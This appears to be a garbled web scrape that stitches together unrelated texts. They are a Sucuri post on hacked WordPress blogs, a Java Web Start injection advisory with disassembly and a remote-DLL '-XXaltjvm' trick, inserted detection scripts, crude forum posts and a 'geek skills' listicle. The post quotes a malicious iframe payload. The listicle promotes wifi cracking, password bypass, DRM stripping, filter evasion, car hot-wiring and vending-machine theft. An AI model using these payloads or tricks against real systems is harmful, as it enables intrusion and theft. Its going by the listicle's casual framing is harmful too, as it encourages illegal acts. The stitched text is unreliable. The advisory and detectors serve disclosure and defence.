The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases.

Anyone else having this issue? If you are, let us know about it.

*To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value on the wp-option table.

**If you need help cleaning this up, send us an email dd@sucuri.net

Update 1: More Network Solutions users affected:

"Same thing -- some HTML inserted into the siteurl field in the wp_options table, and I can't get to my login page. I hadn't upgraded to 2.9.2 yet, and the site's not using SimplePress forum. So it's not just 2.9.2 that is affected, if that helps at all."

And here:

"My site njnnetwork.com got hacked yesterday morning. After a series of non-productive tasks all day, Network Solutions admitted they have been hacked on many WordPress sites."

Here as well:

"They changed my wp-options siteurl to be an iframe pointing to networkads.net/grep The site was not loading correctly so I was able to find this in phpmyadmin. I have had a rash of hacks lately and talked to Network Solutions (my host) They tell me all of their wordpress sites are getting banged up, but their servers are clean."

And many more at the Wordpress forums.

Sucuri Security: Mass infection of Wordpress blogs at Network Solutions
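Because this infection touches no files, a file-integrity scan misses it; the check has to run against the option rows themselves. The following added example (not part of the Sucuri post) parses rows in the dump format quoted above and flags `siteurl` or `home` values that are not a plain http(s) URL. The sample dump is constructed around the row from the post, and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit

# One row of the dump format quoted in the post: (id, blog_id, 'name', 'value', 'autoload')
ROW_RE = re.compile(
    r"\(\s*\d+\s*,\s*\d+\s*,\s*'((?:[^'\\]|\\.)*)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*,\s*'(?:[^'\\]|\\.)*'\s*\)"
)
# Options that must hold nothing but the blog's base URL.
URL_OPTIONS = {"siteurl", "home"}
# Characters that never belong in those values.
FORBIDDEN = re.compile(r"""[\s<>"'`]""")

# Constructed sample dump; the siteurl row is the one quoted in the post.
SAMPLE_DUMP = r"""
INSERT INTO wp_options VALUES
(1, 0, 'blogname', 'Example blog', 'yes'),
(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),
(3, 0, 'home', 'http://blog.example.com', 'yes');
"""


def unescape(sql_string):
    """Undo backslash escaping inside a quoted SQL string literal."""
    return re.sub(r"\\(.)", r"\1", sql_string)


def is_plain_url(value):
    """True only for an http(s) URL with a host and no markup characters."""
    if FORBIDDEN.search(value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def audit_dump(sql_text):
    """Return (option_name, value) for every URL option that fails the check."""
    findings = []
    for match in ROW_RE.finditer(sql_text):
        name, value = unescape(match.group(1)), unescape(match.group(2))
        if name in URL_OPTIONS and not is_plain_url(value):
            findings.append((name, value))
    return findings


if __name__ == "__main__":
    for name, value in audit_dump(SAMPLE_DUMP):
        print("suspicious %s: %s" % (name, value))
```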
-
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years.

The problem lies in the Java Web Start framework, a technology that Sun Microsystems developed to enable the simplified deployment of Java applications. In essence, the JavaWS technology fails to validate parameters passed to it from the command line, and attackers can control those parameters using specific HTML tags on a Web page, researcher Ruben Santamarta said in an advisory posted Friday morning.

Tavis Ormandy posted an advisory about the same bug to the Full Disclosure mailing list on Friday as well. Ormandy said in his advisory that disabling the Java plugin is not enough to prevent exploitation, because the vulnerable component is installed separately.

In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw.

"Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiously also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory.

Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable.

In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch.

"The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said.

The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory.

Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit. Julien Tinnes has more information about this class of Java vulnerability.

Serious New Java Flaw Affects All Current Versions of Windows | threatpost
-
Written by Rubén
Friday, 09 April 2010

Updated: Just in case: Tavis' attack also allows remote code execution since the jar is executing without any restriction.

Updated: Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research into this issue. I was focused on Windows at the moment of the disclosure.

Bye bye my little 0day, Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and another that affects every browser a few weeks ago, so I posted the common "0day++" tweet.

The method by which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor (I really don't think so) or a flagrant case of extreme negligence (+1). It's even more incredible that Sun didn't assess the real risk of this flaw after Tavis reported it to them.

Let's see:

Java Plugin for Browsers (Chrome, Firefox...) - Windows: npjp2.dll (The same for IE8's jp2iexp.dll)

    .text:6DAA3D96
    .text:6DAA3D96 ; =============== S U B R O U T I N E =======================================
    .text:6DAA3D96
    .text:6DAA3D96 ; Attributes: bp-based frame
    .text:6DAA3D96
    .text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p
    .text:6DAA3D96
    .text:6DAA3D96 Data = byte ptr -264h
    .text:6DAA3D96 var_263 = byte ptr -263h
    .text:6DAA3D96 ApplicationName = byte ptr -160h
    .text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch
    .text:6DAA3D96 ProcessInformation= _PROCESS_INFORMATION ptr -18h
    .text:6DAA3D96 cbData = dword ptr -8
    .text:6DAA3D96 hKey = dword ptr -4
    .text:6DAA3D96 arg_0 = dword ptr 8
    .text:6DAA3D96 arg_4 = dword ptr 0Ch
    .text:6DAA3D96
    .text:6DAA3D96 push ebp
    .text:6DAA3D97 mov ebp, esp
    .text:6DAA3D99 sub esp, 264h
    .text:6DAA3D9F push edi
    .text:6DAA3DA0 lea eax, [ebp+hKey]
    .text:6DAA3DA3 push eax ; phkResult
    .text:6DAA3DA4 push 20019h ; samDesired
    .text:6DAA3DA9 xor edi, edi
    .text:6DAA3DAB push edi ; ulOptions
    .text:6DAA3DAC push offset SubKey ; "JNLPFile\\Shell\\Open\\Command"
    .text:6DAA3DB1 push 80000000h ; hKey
    .text:6DAA3DB6 mov [ebp+cbData], 104h
    .text:6DAA3DBD call ds:RegOpenKeyExA
    .text:6DAA3DC3 test eax, eax
    .text:6DAA3DC5 jz short loc_6DAA3DCE
    .text:6DAA3DC7 xor eax, eax
    .text:6DAA3DC9 jmp loc_6DAA3F16

The default handler is "javaws.exe", continuing...

    .text:6DAA3EB7 push [ebp+arg_4]
    .text:6DAA3EBA push eax
    .text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s"
    .text:6DAA3EC0 push esi ; LPSTR
    .text:6DAA3EC1 call ebx ; wsprintfA
    .text:6DAA3EC3 add esp, 14h
    .text:6DAA3EC6 jmp short loc_6DAA3ED4
    .text:6DAA3EC8 ; ---------------------------------------------------------------------------
    .text:6DAA3EC8
    .text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj
    .text:6DAA3EC8 push eax
    .text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s"
    .text:6DAA3ECE push esi ; LPSTR
    .text:6DAA3ECF call ebx ; wsprintfA
    .text:6DAA3ED1 add esp, 10h
    .text:6DAA3ED4
    .text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j
    .text:6DAA3ED4 push 11h
    .text:6DAA3ED6 pop ecx
    .text:6DAA3ED7 xor eax, eax
    .text:6DAA3ED9 lea edi, [ebp+StartupInfo]
    .text:6DAA3EDC rep stosd
    .text:6DAA3EDE lea eax, [ebp+ProcessInformation]
    .text:6DAA3EE1 push eax ; lpProcessInformation
    .text:6DAA3EE2 xor ebx, ebx
    .text:6DAA3EE4 lea eax, [ebp+StartupInfo]
    .text:6DAA3EE7 push eax ; lpStartupInfo
    .text:6DAA3EE8 push ebx ; lpCurrentDirectory
    .text:6DAA3EE9 push ebx ; lpEnvironment
    .text:6DAA3EEA push ebx ; dwCreationFlags
    .text:6DAA3EEB push ebx ; bInheritHandles
    .text:6DAA3EEC push ebx ; lpThreadAttributes
    .text:6DAA3EED push ebx ; lpProcessAttributes
    .text:6DAA3EEE push esi ; lpCommandLine
    .text:6DAA3EEF lea eax, [ebp+ApplicationName]
    .text:6DAA3EF5 push eax ; lpApplicationName
    .text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h
    .text:6DAA3EFD call ds:CreateProcessA

So basically the Java-Plugin Browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a webpage.

Let's see JavaDeploy.txt:

    if (browser == 'MSIE') {
        document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
            'width="0" height="0">' +
            '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
            '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
            '<' + '/' + 'object' + '>');
    } else if (browser == 'Netscape Family') {
        document.write('<' + 'embed type="application/x-java-applet;jpi-version=' +
            deployJava.firefoxJavaVersion + '" ' +
            'width="0" height="0" ' +
            'launchjnlp="' + jnlp + '"' +
            'docbase="' + jnlpDocbase + '"' +
            ' />');
    }

That's it. This is how JAVA Plugin identifies Java Web Start content (jnlp files). So we can inject command-line parameters through "docbase" tag and even "launchjnlp".

What type of arguments can we abuse to compromise a system?

java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiously also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...

Linux

Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so

    .text:0000A956 call _fork
    .text:0000A95B test eax, eax
    .text:0000A95D jnz loc_A813
    .text:0000A963 mov [esp+3048h+var_3048], esi
    .text:0000A966 lea eax, [ebp+var_3038]
    .text:0000A96C mov [esp+3048h+var_3044], eax
    .text:0000A970 call _execv

MACOSX

Not vulnerable.

Workaround

Disable javaws/javaws.exe in Linux and Windows by any means. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory.

Reverse Mode - [0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading
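Both the threatpost summary and the advisory above come down to one fact: the `launchjnlp` and `docbase` values from a page reach the javaws command line unvalidated. The following added example (not from the advisory or from Sun's code) is a detection sketch that scans HTML for those attributes and flags values that are not a single URL-like argument, for use at a proxy or in a crawl of your own sites. The sample page, host names and function names are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attribute / PARAM names the plugin reads, per the JavaDeploy.txt excerpt above.
LAUNCH_ATTRS = {"launchjnlp", "docbase"}
# A dash-prefixed token at the start of the value or after whitespace or a quote.
OPTION_TOKEN = re.compile(r'(?:^|[\s"])-[A-Za-z]')

# Constructed sample page; host names and the share path are placeholders.
SAMPLE_PAGE = r'''
<embed type="application/x-java-applet" width="0" height="0"
       launchjnlp="http://apps.example.com/notes.jnlp"
       docbase="http://apps.example.com/" />
<embed type="application/x-java-applet" width="0" height="0"
       launchjnlp="notes.jnlp"
       docbase="-J-XXaltjvm=\\fileserver.example\share" />
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
  <PARAM name="launchjnlp" value="http://apps.example.com/notes.jnlp">
  <PARAM name="docbase" value="http://apps.example.com/ -J-XXaltjvm=PLACEHOLDER">
</object>
'''


def suspicious(value):
    """Return a reason if value could change the javaws command line, else None."""
    if value is None:
        return "attribute has no value"
    if OPTION_TOKEN.search(value):
        return "option-like token"
    if re.search(r'[\s"]', value):
        return "whitespace or quote splits the argument"
    try:
        scheme = urlsplit(value).scheme
    except ValueError:
        return "unparseable URL"
    if scheme and scheme not in ("http", "https"):
        return "unexpected scheme " + scheme
    return None


class LaunchTagScanner(HTMLParser):
    """Collects (tag, attribute, reason, value) for suspicious launch values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def _check(self, tag, name, value):
        reason = suspicious(value)
        if reason:
            self.findings.append((tag, name, reason, value))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "embed":
            for name in sorted(LAUNCH_ATTRS & attrs.keys()):
                self._check(tag, name, attrs[name])
        elif tag == "param":
            name = (attrs.get("name") or "").lower()
            if name in LAUNCH_ATTRS:
                self._check(tag, name, attrs.get("value"))


def scan_html(html):
    """Scan one HTML document and return the list of findings in page order."""
    scanner = LaunchTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for tag, name, reason, value in scan_html(SAMPLE_PAGE):
        print("<%s> %s: %s -> %r" % (tag, name, reason, value))
```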
-
You get a warn if you don't post a swear word! ))))
-
Let me see who comes up with the best swear word! I say: my dick.
-
If you consider yourself a geek, or aspire to the honor of geekhood, here's an essential checklist of must-have geek skills.

The term 'geek', once used to label a circus freak, has morphed in meaning over the years. What was once an unusual profession transferred into a word indicating social awkwardness. As time has gone on, the word has yet again morphed to indicate a new type of individual: someone who is obsessive over one (or more) particular subjects, whether it be science, photography, electronics, computers, media, or any other field. A geek is one who isn't satisfied knowing only the surface facts, but instead has a visceral desire to learn everything possible about a particular subject.

A techie geek is usually one who knows a little about everything, and is thus the person family and friends turn to whenever they have a question. If you're that type of person and are looking for a few extra skills to pick up, or if you're a newbie aiming to get a handhold on the honor that is geekhood, read on to find out what skills you need to know.

1. The Meaning of Technical Acronyms
- USB - Universal Serial Bus
- GPU - Graphics Processing Unit
- CPU - Central Processing Unit
- SATA - Serial ATA
- HTML - Hyper-text Markup Language
- HTTP - Hypertext Transfer Protocol
- FTP - File Transfer Protocol
- P2P - Person to Person data sharing

2. How to Reset RAM
If you rolled your eyes here, that is a good thing. If not, you have many things to learn, young padawan. It's amazing how few people know how to do this. If you're unsure, hit up the link below to find out how:
http://www.yousaytoo.com/sudjarwo/how-to-reset-ram-in-a-computer/29133

3. Identify Keyloggers
Internet cafes are the most likely place you'll find them, followed by library, perhaps, and maybe even your own house if you've some unscrupulous friends/family. Identity theft groups warn about keyloggers and advocate checking out the keyboard yourself before continuing. Can you identify a keylogger, however, if one is plugged into the back of the system? Here's what one looks like: Hit up this link for excellent info on keyloggers on public computers and how to protect yourself:
http://www.ghacks.net/2007/06/28/how-to-defeat-most-keyloggers-on-public-computers/

4. Surf the Web Anonymously
We won't make any assumptions about why you may need this particular skill, but the fact remains that every geek should know how to traverse the Internet with the highest amount of security possible. Aside from the safest method--which is using a connection that is not yours--you will need the ultimate in proxies...Tor. Tor is an onion-routing system which makes it 'impossible' for someone to find out who you actually are.

5. Bypass a Computer Password on All Major Operating Systems
Obviously you shouldn't use this to gain unlawful access to a computer. If you're a geek, however, you'll eventually end up in a situation where someone forgets their password, you acquire a machine with an operating system you cannot access, or similar situation. See this tutorial for info on how to bypass the password on the three major operating systems: Windows, Mac, and Linux.
http://www.joetech.com/2009/01/29/how-to-crack-the-account-password-on-any-operating-system/

6. Find a User's IP Address on AIM
Knowing someone's IP address is actually pretty useless in this case, but most people don't realize that. If someone is harassing you via AIM and you can't get them to stop, discovering their IP and sending it to them--with a nicely worded threat of law enforcement involvement should they not stop--is likely enough to send them scampering away with tail between legs.
http://www.elitehackers.info/forums/archive/index.php/t-2827.html

7. Hide a File Behind a JPEG
So you need a nice spot to hide your blackmail personal files. You could, of course, bury them deeply within a series of random, useless folders, but there's always the chance of them being discovered. A password protected RAR is the best choice, but it's a bit obvious despite the most boring title you could give it. A sneaky person would hide the important file behind a completely random and boring family reunion photo, where no person in their right mind would sift through.
http://www.online-tech-tips.com/computer-tips/hide-file-in-picture/

8. Crack a Wifi Password
This is one of those things you don't need to do (hopefully), but that you still need to know just for the sake of knowledge. A strong WPA password is very secure, but most people don't want to bother learning a convoluted series of letters, numbers, and symbols, instead opting for random everyday words. A good overall tutorial on wifi and cracking can be found here:
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

9. Monitor Network Traffic
The Internet is a vast place with a bit of everything. Whether you're curious about what your roommate is downloading, your kid is getting into, or any leeches living around you who've unscrupulously breached your wifi, knowing how to analyze network traffic is an invaluable skill. Here is a list of dozens of network analyzers, as well as some general info to get you started:
http://www.slac.stanford.edu/xorg/nmtf/nmtf-tools.html

10. Recover Master Boot Record
A virus or other problem can lead to an MBR error, which will make it impossible to access install. Many users would simply become frustrated and reinstall, but not you! Every geek should know how to recover the master boot record. Here is an excellent guide to get started:
http://www.ntfs.com/mbr-damaged.htm

11. Retrieve Data off Hard Drive
There will come some point in your life when a hard drive craps out sans warning. It could be due to a number of reasons--physical damage, file corruption, etc. There are computer service centers that would be happy to extract the data for a (hefty) fee; a true geek would be the one working at center, not taking his or her drive there. To find out how to retrieve data off a damaged hard drive, read here:
http://laptoplogic.com/resources/5-ways-to-retrieve-data-off-a-crashed-hard-drive

12. Load Rockbox onto an MP3 Player
The firmware that comes on your average mp3 player is intended for those who are scared of advanced features; often, the only audio settings available are a few prearranged EQs. If you're an audiophile--or simply frustrated with the lack of control over your music settings--Rockbox is the firmware for you. Open source and free, it can be installed on several different types of players and enables full control over what you listen to.
http://rockbox.org

13. Unbrick a Smartphone
No geek can resist the allure of flashing the newest beta firmware onto their shiny smartphone. The byproduct of that is sometimes a bricked phone, which would leave many sobbing into their pillow at night. To avoid rendering your $400 gadget into a door stopper, learn the fine art of unbricking and then flash away. As the method used to fix a phone will vary, this is the best place to start looking for answers:
http://www.howardforums.com/

14. Replace a Laptop Keyboard
Keyboards get gummy after awhile. If you use yours a lot (aka: all day), then you probably eat over it at some point. Crumbs get into the keys and things are sticking, and before you know it, you need a new keyboard.
http://www.refurbished-laptop-guide.com/how-to-remove-a-laptop-keyboard.html

15. Rip Streaming Videos
Streaming videos are officially in vogue. We're not going to make any assumptions about what type of videos you are streaming and may want to keep, but no matter what it is, any geek could rip them while sipping a Red Bull and watching the latest episode of BSG. Here's a hint to get you started:
http://applian.com/download-videos/

16. Strip Windows DRM
DRM is incredibly annoying. With many online stores now offering DRM-free mp3 audio files, it would seem it's not as big of an issue as it used to be. That is not the case, however, with all videos bearing a DRM as well as music of a higher-quality than MP3. Stripping Windows DRM is not legal. If you're a geek, you probably don't care:
http://undrm.info/remove-DRM-protection/FairUse4WM-freeware-DRM-removal-Windows-software-Strip-copy-protection-from-WMV-ASF-WMA-Windows-Media-Player.htm

17. Homebrew Hack Game Systems
Gaming consoles are notorious for having features you can't use simply because the manufacturer decided to lock them down. As a geek, you can't just be satisfied with the features they decided to give you. No, you have to crack that case open and take a peek inside. Every geek should know how to homebrew hack their system and unlock its full potential.

18. Find a Website IP Address Without Web/Command Prompt Access
Some school admins think they're being sneaky when they lock down the command prompt and block all major IP search websites and block all the websites you actually want to visit. Of course, that is child's play for any geek. First, to get a new command prompt, open Notepad and type: command.com. Then, save as "cmd.bat". You now have a command prompt. Now, open the command prompt and type "ping http://www.website.com/" to find the IP address of that website. Enter the website into the browser and you will officially have impressed all your friends.

19. Bypass School or Work Website Blocks
What is a horrific situation for an average computer user is a simple irritation for an everyday geek. To bypass a website block/filter, simply enter that website's IP address in instead of the actual site address.

20. Screw with Wifi Leeches
Nobody likes a wifi leech. At best, they're simply using up your valuable bandwidth. At the worst--and far more likely, they're stealing your identity and watching your activities. After watching your network and identifying the leech, use this trick to flip their browser upside down and let them know you don't appreciate the intrusion.
http://tech.nocr.at/hacking-security/baffle-wifi-leeches-with-an-upside-down-ternet-2/

21. Hexadecimal and Binary Number Systems
Everyone knows the normal, everyday digit system used. It takes a special--possibly psychotic person--to also know hexadecimal and binary number systems. Here is an excellent interactive tutorial on learning the two systems:
http://www.wisc-online.com/objects/index_tj.asp?objID=DIG1102

22. How to Hot Wire a Car
If your family always turns to you any time their computer hiccups, their DVD player needs fixed, or their home security system doesn't activate, it's only a matter of time before someone asks you how to hot wire a car. Wouldn't it be great to be able to answer them? To learn this unique skill, read here:
http://howto.wired.com/wiki/Hot_Wire_Your_Car

23. Increase Wifi Range
With so many small portable gadgets gaining more and more sophisticated web browsers, in addition to gaming systems like the PSP and DS, getting the most use out of your wifi is practically a geek necessity. Here is a good guide on extending your wifi's range:
http://www.mavromatic.com/archives/000451

24. Carrying a Computer Cleaning Arsenal on Your USB Drive
A good geek prepares for their friends' stupidity. No matter how many times you tell them to stop downloading porn, they keep doing it until their machine is so infected it can't drag itself into a grave. An arsenal of portable malware cleaners, a portable task manager, anti-virus, etc, will make those impromptu purging sessions all the easier.

25. Running an Operating System from a USB Thumb Drive
Most people don't even understand what the magical operating system is. As a geek, you should transcend that basic knowledge and have a small operating system on your thumb drive handy for those times you need computer access but don't know the password to a nearby computer.
http://www.pendrivelinux.com/

26. Understand What "There's no Place Like 127.0.0.1" Means
A lot of geeks wear this shirt as a short hand code for their computer finesse--or maybe just to screw with other people who stare but cannot figure out what it means. No matter the reason, if you'd like an answer, check out the link below.
http://www.tech-faq.com/127.0.0.1.shtml

27. Read 1337 At Normal Speed
Sure, everyone knows about it and it's no longer cool, but if you're going to proclaim yourself as a geek, you should be able to read it full speed. Who wants to choke in front of the wannabe that learned to read it full speed and flaunts it in your face?
http://www.wikihow.com/Read-and-Write-in-1337

28. At Least One Fictional Language
And not only should you know a fictional language, but you should use it to say something about yourself. Do you choose Klingon or Quenya? Here's a list of constructed languages:
http://en.wikipedia.org/wiki/List_of_constructed_languages

29. How to Survive in a Linux Argument
Linux is gaining an all around higher standing in the geeksphere, and it's bound to enter a conversation at some point (which will invariably end up turning into an argument). If you want to keep up, you'll need to understand the basic points of Linux, as well as the general info of all basic things. Here's a good place to read and gain a foothold:
http://www.linux.com/articles/feature/

30. Identify Major Constellations
For those times you venture from the air-conditioned, computer filled basement of your parents' house (or something like that), look up at the stars and have yourself a Galileo moment. The stars may just be dots to many people, but with the handy website below, you'll be spotting man-belts and lions in no time.
http://www.sky-watch.com/astronomy-guide/major-constellations.html

31. Use a Camera in Manual Mode
Sure, you could just use auto mode like everyone else too afraid to learn what some letters and numbers mean, but then you wouldn't be much of a geek, would you? The oft-ignored dial on a camera is the key that unleashes the best quality photos possible, and every geek should be a whiz at using one.
http://digital-photography-school.com/digital-camera-modes

32. Who Mulder and Scully Are
It seems that in the plethora of geek websites, there always appears a joke about Mulder and Scully, the two main characters from the X-Files. If you don't know who they are, you'll be left in the dark, alone, contemplating what exactly it was you were doing in the 90's that you wouldn't understand the joke.
http://en.wikipedia.org/wiki/Mulder_and_Scully_(song)

33. Javascript
HTML is running the world (not really). Everyone knows some HTML and it makes them feel empowered. As a geek, you want to transcend that basic knowledge others share and know a little more. JavaScript is the answer--it is easy to learn if you're not actually interested in web programming, but simply curious, and it looks scary to anyone who doesn't know it.
http://www.yourhtmlsource.com/javascript/basicjavascript.html

34. How to Unlock an iPhone
Sure, most geeks wouldn't be caught dead with an iPhone, but what about your friends? You're the smart techie, they'll expect you to know how to unlock it.
http://www.pcworld.com/article/137223/how_to_unlock_an_iphone.html

35. How to Install Mac OS X on a PC
Just because you don't want Mac on your PC doesn't mean you shouldn't know how to do it. Knowledge is power, right? Go ahead, use this to stump your friends and family.
http://dailyapps.net/2007/10/hack-attack-install-leopard-on-your-pc-in-3-easy-steps/

36. Build a PC
If you purchase a ready-made PC, you can be sure of one thing--you're paying more than you should. Assembling your own PC isn't too hard, and is the first thing you should be aiming to accomplish as a geek. Here is a massive article on assembling your own PC:
http://www.pcmech.com/byopc/

37. Tethering a Smartphone
Nothing like a little wifi on the move, eh? Tethering a smartphone means using the Internet on your laptop/netbook via your cell phone. Of course, the method to do this depends on your phone, but here's an article to get you started:
http://www.tech-recipes.com/rx/2276/smartphones_bb_treo_tether_modem_usa_carriers/

38. Wiring a Home Theater System
Home theater systems used to consist of a TV and a chair. Gone are those days of simplicity, however, and setting up a modern system can be pure mind-boggling horror. Where does the modulator go, why does the DVD player have no video and the cable box no sound? Here's a tutorial, including excellent diagrams, to show you how:
http://www.prillaman.net/ht_info_8-wiring.html

39. Replacing a Laptop LCD
Laptop LCDs are vulnerable to many different mishaps: accidental pressure spots, shadows, airsoft pellets.... No matter, there will come a point when you need to swap your LCD for a new one. Now, as a geek, you probably don't have an extended warranty. If that's the case, here are some excellent pages and pictures on replacing the display:
http://www.fonerbooks.com/laptop_4.htm

40. Make a Laptop Cooling Pad
Can you believe these cost $50?! A geek will need one, because data crunching/DVD ripping/videos playing/rendering at the same time tends to cause excess heat. Instead of shelling out your hard earned dollars, make your own like so:
http://www.instructables.com/id/Lazy-mans-laptop-cooler/

41. Unleash a Laser Pointer's full potential
A normal person uses a laser pointer to drive their dog crazy. A geek uses it to melt butter for their grilled cheese sandwich. To unleash a laser pointer's full strength, crack open the case, fry the resistor with a hot soldering iron, then snap it back together and keep it away from flesh/eyes/airplanes. The pointer will burn out after a few hours, but what a fun few hours they will be. Note: this is dangerous. Don't do anything stupid.

42. Keyboard Shortcuts
This will depend on your operating system and the apps you use, so there's no tutorial available. However, that is irrelevant--you're a geek, you can find them yourself. Shortcuts are the difference between a slow computer user and a geek. The geek will always win out in a speed contest, because they do practically everything from their keyboard.

43. Soldering Glasses Together
Nerds use tape on broken glasses; geeks use solder. 'Nuff said.

44. How to Execute a Shell Script
If you're a true geek, you'll need to do this at some point. Below are instructions on how to do so. Remember: always be cautious when running a script, you don't want your computer to turn into a door stop, now do ya?
http://www.mcsr.olemiss.edu/unixhelp/scrpt/scrpt1.2.html

45. How to Hack a Pop Machine
Okay, so stealing isn't cool. Still, hacking is simply a misunderstood art, right? So hacking a pop machine isn't really stealing, because it's not about the pop, it's about the pleasure of getting your way. Or something like that. (Newsflash, it is illegal, don't do it.) If you want to try your fingers at getting a free Coke, check out this link:
http://skattertech.com/soda-machine-hack/

46. Turn a Laptop into a Digital Picture Frame
So you want to show off pictures of your dog and that girl you once met, but you want to do it in an uber geeky way. Any schmuck can go to Walmart and buy a digital picture frame for a grossly inflated price. But you...oh, you're too smart for that. No, instead you'll find an old laptop on eBay for $5 and turn it into a true work of art.
http://repair4laptop.org/notebook_picture_frame.html

47. How to Mod a Flash Drive Case
All the geeks are doing it.... Whatever. The case your flash drive came in is probably weak and most certainly plain. Why not jazz it up with your own unique style? Here's one such case mod, and dozens of related projects:
http://www.instructables.com/id/Metal-USB---Flash-drive-case-mod/

48. Do Cool Things to Altoids Tins
People are obsessed with these things. Altoids tins are durable, small, and just begging to be filled with LEDs, mp3 players, audio amps, and maybe some snuff. A good geek will find millions of uses for these little metal wonders. If you need a mental boost, however, here's some interesting links:
http://www.squidoo.com/altoids-tins

49. Convert Cassette Tapes to Digital Audio Files
If your geekhood started in the 90's, then you probably have at least a few (dozen) cassette tapes still sitting around. Why not breathe digital life into them before they fall ill to mortal fate?
http://lifehacker.com/software/mp3/alpha-geek-how-to-digitize-cassette-tapes-222394.php

50. Lock Your Computer with a USB Drive
You don't want anyone getting into your files while you're gone. A normal password would be enough to keep most people out, but what if you got super-secret X files on your computer? You can lock your machine down with a USB drive via these instructions:
http://lionjkt.wordpress.com/2008/12/31/how-to-lock-your-computer-with-usb-drive/

51. Run Your Own Ethernet Line
Wifi has taken the place of a wired connection in many homes, and with good reasons--you can go anywhere, no cables necessary. What about those...sensitive...activities that you'd rather the neighborhood script kiddie didn't see on your wifi? An Ethernet cable is your solution. To wire your own Ethernet, hit up this link:
http://www.ertyu.org/steven_nikkel/ethernetcables.html

52. Set Up a Streaming Media Server
With digital files becoming the ultimate medium, many people have hundreds of gigabytes worth of music, videos, and pictures. You could keep them on a portable hard drive, but then you'd have to take it everywhere, and only one person could use it at a time. The solution is a streaming media server, something no geek can live without.
http://www.n00tz.net/2008/07/vlc-media-server-ubuntu-hardy/

53. Setting up a VPN
If you're like most geeks, you can't live without your computers. They store your life in some poetic fashion, holding files you feel a personal connection with.... Anyway, if you are at work and suddenly realize you left an important picture at home (or you need blackmail material pronto), having a VPN ready to go will save you big time.
http://www.computernetworkinghelp.com/content/view/41/1/

54. Turn Webcams into Security Cameras
Is someone stealing your Netflix DVDs? Do you suspect it is a fat hairy man in his boxers taking them each morning? If so, you can get your proof using a couple webcams and a bit of software.
http://www.simplehelp.net/2006/09/27/how-to-use-your-pc-and-webcam-as-a-motion-detecting-and-recording-security-camera/

55. Control Your House Lights with a Computer
Controlling the lights in your house via computer is a great way to freak out the neighborhood kids ding-dong-ditching (assuming you wire up a Halloween scream motion sensor, also). If your reasons are less nefarious, you simply use it to turn on and off lights without having to lift ye butt from thy seat, which is a good reason in itself.
http://www.instructables.com/id/Control-lights-in-your-house-with-your-computer/

56. Play Retro Games without Retro Consoles
This applies to the geeks who enjoy gaming. Setting up an emulation PC on your TV is a great way to relive those games of old.

57. Put LEDs Inside a Lightbulb
